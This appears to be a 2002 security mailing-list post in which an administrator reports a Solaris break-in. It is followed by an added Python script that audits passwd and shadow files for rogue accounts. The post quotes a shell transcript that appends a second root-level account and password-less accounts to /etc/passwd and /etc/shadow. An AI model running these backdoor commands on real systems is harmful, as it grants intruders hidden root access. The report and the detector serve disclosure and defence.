Message-ID: <3d5d13b4.33f6.0@australia.edu>
From: security at australia.edu (security@...tralia.edu)
Subject: more than idle threats I'm afraid

memetic-engineer@...hmail.com wrote:
http://lists.netsys.com/pipermail/full-disclosure/2002-August/001073.html


"#old solaris bug die hard.....something similar, but not quite. Have you audited your Solstice

#products recently? lit_tty was nothing.
    M^ got lost again
    ( agent.lspitzner.added.to.meme156)
 cp /etc/passwd /etc/.tp;"



I assumed he was speaking of a variation of this old thing:
> # cp /etc/passwd /etc/.tp;
^Mcp /etc/shadow /etc/.ts;
echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
echo "r::10891::::::" >> /etc/shadow;
echo "re::6445::::::" >> /etc/shadow;
: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# who;
rsides    console     WED Aug 15 2002 21:09
^M: not found
# exit;


and after converting the hex saw that it was an exact replica.

To make a long story short, I woke up yesterday to find this in my home directory:

./MeMe156/agent.agency.08.14.02.2348/added .agent.sol


After looking through:
/var/adm/messages
/var/adm/syslog

to no avail, I used what I thought to be a clever script that logs
auth.notice messages. NOTHING

/var/log/utmp; /var/log/utmpx
/var/log/wtmp; /var/log/wtmpx
/var/log/syslog

Nothing. But then /var/log/sulog showed me this:
SU 03/31 12:52 + pts/0 <userid>-root
and /var/adm/messages revealed this:
Mar 31 12:48:41 ***.***.***.*** unix: rebooting...

almost convenient that it was there at all. If anyone else has any
information remotely related please respond.

I administer a private lab running 2 Sun LX50s involved in active ionospheric
research and HF analysis.



"In building a machine we are so intent upon our purpose that we forget that
we are investing that machine with creative power...it can overgrow us in an
invisible way...they are the dwelling-places of divine powers that may destroy
us."
-C.G. Jung
  

This message was sent from http://australia.edu
Check out the new international site at http://australia.edu/international
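
The transcript quoted in the message appends a second UID 0 account and two accounts with empty password fields to /etc/passwd and /etc/shadow. The following is an added example, not part of the original message or written by its author: a small audit that flags exactly those conditions in passwd and shadow text. The sample data is constructed; the `r` and `re` lines are copied from the transcript, while the `root` and `daemon` lines and the hash placeholder are assumptions made for illustration.

```python
# Added example: audit passwd/shadow contents for the changes shown in the transcript.
# SAMPLE_* data is constructed; only the "r" and "re" lines come from the message.

SAMPLE_PASSWD = """\
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
r:x:0:0:User:/:/sbin/sh
re:x:500:1000:daemon:/:/sbin/sh
"""

SAMPLE_SHADOW = """\
root:CONSTRUCTEDHASH:6445::::::
daemon:NP:6445::::::
r::10891::::::
re::6445::::::
"""

def parse(text, min_fields):
    """Yield colon-split records, skipping blanks, comments and short lines."""
    for line in text.splitlines():
        line = line.rstrip("\r")  # tolerate stray carriage returns (^M)
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= min_fields:
            yield fields

def audit(passwd_text, shadow_text):
    """Return (account, reason) findings in passwd order."""
    findings = []
    shadow = {f[0]: f[1] for f in parse(shadow_text, 2)}
    for f in parse(passwd_text, 7):
        name, pw, uid = f[0], f[1], f[2]
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 but not root"))
        # "x" means the password lives in shadow; an empty field there
        # means the account has no password at all.
        if pw == "" or (pw == "x" and shadow.get(name) == ""):
            findings.append((name, "empty password"))
        if pw == "x" and name not in shadow:
            findings.append((name, "no shadow entry"))
    return findings

if __name__ == "__main__":
    for name, reason in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{name}: {reason}")
```

On a live system the two arguments would be the contents of /etc/passwd and /etc/shadow, read as root.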
